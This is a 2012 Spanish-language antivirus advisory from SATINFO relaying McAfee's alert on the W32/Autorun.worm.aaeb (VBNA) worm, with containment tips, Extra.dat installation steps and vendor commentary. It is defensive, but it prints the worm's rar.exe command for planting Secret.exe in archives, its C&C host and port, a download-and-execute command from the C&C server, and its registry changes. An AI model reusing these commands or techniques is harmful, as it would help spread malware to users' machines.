McAfee avisa de un brote de nuevas variantes del gusano W32/Autorun.worm.aaeb

(Lo conocemos como VBNA y lo vamos controlando con el ELISTARA/ELIVBNA)

El gusano W32/Autorun.worm.aaeb tiene la habilidad de infectar dispositivos extraíbles así como unidades de red montadas.

La infección puede iniciarse por una ejecución manual del archivo infectado o, simplemente, por navegar en cualquier carpeta que contenga los archivos infectados en la que el archivo “Autorun.inf” pueda causar la ejecución automática del malware.

Además es capaz de añadir una copia del propio malware en archivos Zip y Rar.

También tiene la posibilidad de descargar otros archivos malware y actualizarse de forma remota vía un servidor C&C.

NOTA:  Si bien dicen que de momento este malware solo ha sido detectado únicamente en EEUU y en América del Sur,  se debe tener en cuenta que el que conocemos como VBNA  hace lo mismo y ya lo conocemos desde hace tiempo en España…

Método de infección y de propagación:

Se propaga creando copias de sí mismo en dispositivos de almacenamiento y en unidades de red montadas.

Genera un archivo “autorun.inf” para permitir su ejecución de forma automática cuando cualquier sistema con la función autorun habilitada se conecta a la unidad infectada.

Modifica los atributos de los directorios de la unidad afectada para crear copias de sí mismo con el mismo nombre de fichero como carpeta y ocultarlas.

También busca archivos en las unidades extraíbles con las extensiones indicadas a continuación y modifica sus atributos para ocultarlos y crear copias de sí mismo como archivo oculto:

mp3, avi, wma, wmv, wav, mpg, mp4, doc, txt, pdf, xls, jpg, jpe, bmp, gif, tif, png

Se asegura de mantener los ficheros con atributos de oculto manteniendo el valor del registro de sistema ShowSuperHidden a “0”.

•HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

ShowSuperHidden = dword:00000000

El malware crea copias de sí mismo con los siguientes nombre de archivo:

•Secret.exe

•Sexy.exe

•Porn.exe

•Passwords. Exe
De esta forma los usuarios pueden acabar abriendo el archivo vírico sin ser conscientes de ello.

También genera un archivo de 0 bytes en el dispositivo extraíble llamado x.mpeg

Además añade una copia de sí mismo en cualquier archivo ZIP o RAR que encuentre en el sistema: verifica la existencia de WinRar en el equipo para utilizar la linea de comandos de “rar.exe” y añadir la copia del malware en el archivo zip o rar encontrado.

Ejecuta Rar.exe con los siguientes parámetros:

Rar.exe a -y -ep -IBCK “<archivo rar/zip encontrado>” “%userprofile%\Secret.exe”

El archivo de malware que se añade a los archivos afectados se llamará Secret.exe.

Los otros nombres de detección conocidos para este malware son:

•W32/Autorun.worm.aaec

•W32/Autorun.worm.aaed

•W32/Autorun.worm.aaee

•W32/Autorun.worm.aaef

•W32/Autorun.worm.aaeg

•W32/Autorun.worm.aaeh

•VBObfus.ey

•VBObfus.ez

•VBObfus.fa

Consejos de contención del malware:

•Deshabilite la función Autorun en Windows localmente con nuestra utilidad EliPen o mediante GPO de Windows.

•Restrinja el acceso a unidades USB en equipos críticos y en servidoresmediante GPO o con el software Device Control de McAfee.

•Implementey realice pruebas con las directivas de protección de acceso de VirusScan Enterprise para bloquear la creación de archivos AUTORUN.INF.

Características y síntomas:

Descripción:

Tras su ejecución el malware crea copias de sí mismo en %UserProfile%\[aleatorio].exe

Se conecta al dominio Ns1.helpupdater.net mediante el puerto TCP 9004 para descargar comandos remotos

El servidor C&C envía automáticamente comandos al equipo infectado una vez establecida la comunicación por el puerto 9004. El comando enviado provoca que el equipo infectado descargue y ejecute un archivo desde la URL que se le indique.

El comando enviado por el servidor C&C es el siguiente:

:.dl http://<6 dígitos aleatorios>.zdns.eu:443/QJvDPNrUwp?f google.com

Una vez que el malware recibe este comando intentará descargar y ejecutar el archivo descargado.

Las peticiones http GET enviadas por el malware durante la descarga del archivo maliciosos especificado por el servidor C&C son las siguientes:

GET /zRDxrG/?f HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)

Host: <6 dígitos aleatorios>.zdns.eu

Connection: Keep-Alive

El malware deshabilita también la función de Windows Update cambiando el valor de registro NoAutoUpdate a 1:

•HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU

NoAutoUpdate = dword:00000001

Contención del brote:

Se recomienda a los usuarios que hagan cuidado a la hora de abrir correos no solicitados con archivos adjuntos sospechosos.

Es muy importante mantener actualizado el sistema operativo mediante Windows Update así como tener actualizados los parches de cualquier software de terceros, actualizar regularmente las definiciones de virus y crear unas reglas de filtrado apropiadas:

•A ser posible bloquear el acceso al puerto especificado y monitorizar y bloquear el acceso a las URLs indicadas.

•Crearreglas de protección de acceso para bloquear la creación de archivos en la carpeta anteriormente indicada.

•La Protección de Acceso debe estar ACTIVADA y se deben definir reglas apropiadas para poder descubrir qué procesos son responsables de modificar los atributos de archivos y carpetas.

Mecanismo de reinicio:

Descripción:

La clave de registro especificada a continuación permite que el troyano se ejecute automáticamente cada vez que Windows se inicie:

•HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

<nombre del malware> =” %UserProfile%\<Nombre aleatorio>.exe /e

 

 

Solución:

A la espera de añadir la detección de este malware y sus variantes al archivo DAT diario, McAfee ha generado un archivo Extra.dat para poder controlar todos los nombres de detección indicados anteriormente.

Para poder realizar la instalación de este archivo Extra.dat pueden seguir el método que más les convenga.

 

Instalación del archivo extra.dat en equipos sin gestionar por ePO:

Haga clic en Inicio, Ejecutar, escriba services.mscy haga clic en OK.

•Haga clic con el botón derecho sobre el servicio McAfee McShield y seleccione la opción Detener.
•Copie el archivo ExtraDAT ya descomprimido a la ruta siguiente:

– Equipos de 32 bits:
C:\Archivos de Programa\Archivos Comunes\McAfee\Engine

– Equipos de 64 bits:
C:\Archivos de Programa (x86)\Archivos Comunes\McAfee\Engine

•En la consola de servicio haga clic con el botón derecho sobre el servicio McAfee McShield y seleccione la opción Iniciar.

Las detecciones incluidas en el archivo ExtraDAT tendrán efecto una vez que el servicio McShield se haya iniciado.

Instalación del archivo extra.dat mediante la consola ePO:

•Añada el archivo extra.dat (ya descomprimido) al repositorio de ePO utilizando la opción Archivo DAT adicional (.DAT)
•Cree una nueva tarea de actualización seleccionado únicamente el archivo extraDAT añadido (aparece normalmente con el nombre ExtraDAT (M4;W32.Autorun.worm.aaeh)) o bien modifique su tarea de actualización existente para añadir también el archivo extraDAT.
•Ejecute la nueva tarea de forma inmediata o programada, al ser un paquete pequeño no perjudicará el ancho de banda aunque se realice el despliegue de forma recurrente.

 

Para descargar el archivo Extra DAT pulse aquí

Para descargar la utilidad EliPen pulse aquí

SATINFO, SERVICIO DE ASISTENCIA TÉCNICA INFORMATICA29 de Noviembre de 2012

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contactar con info@satinfo.es
..
http://www.satinfo.es/noticies/?p=523 Fuente

____________________

 

NOTA IMPORTANTE:

Ya de antaño controlamos con el ELIVBNA unas 150 variantes básicas de troyanos polimórficos que hacen lo mismo, si bien algo de lo que ahora indican, como esto de que infecta ZIP y RAR añadiendo una copia de si mismo con el nombre de SECRET.EXE, no lo habiamos detectado, si bien ya se contempla en todos los ELI*.* (incluido el ELIVBNA para este caso) el escanear en los ZIP si se quiere, aunque ello logicamente ralentice el escaneo.

Aunque a McAfee se le han ido enviando puntualmente todas estas muestras, no se habían percatado de la gravedad del problema, ya que los VBNA descargan variedad de malwares como SIREFEF, FAKE WRITE, LDRSOF, WALEDAC, PROXY EXI, FAKE AV’s, etc, hasta que al parecer se está expandiendo por EE.UU. y lo están sufriendo en sus carnes… cuando aqui ya lo estamos controlando inicialmente con el ELISTARA, y especificamente con el ELIVBNA cuando se advierte su presencia, ya que su polimorfismo requiere un tratamiento especial diferente al habitual del ELISTARA

Haremos las pruebas de los ZIP con los VBNA conocidos, y seguiremos controlandolos como hasta ahora, si bien quizas los nuevas DAT de McAfee nos ayudarán a controlarlos con el VSHIELD residente y evitar que se instalen y descarguen toda la lista de malwares que tiene programados descargar.

saludos

ms, 29-11-2012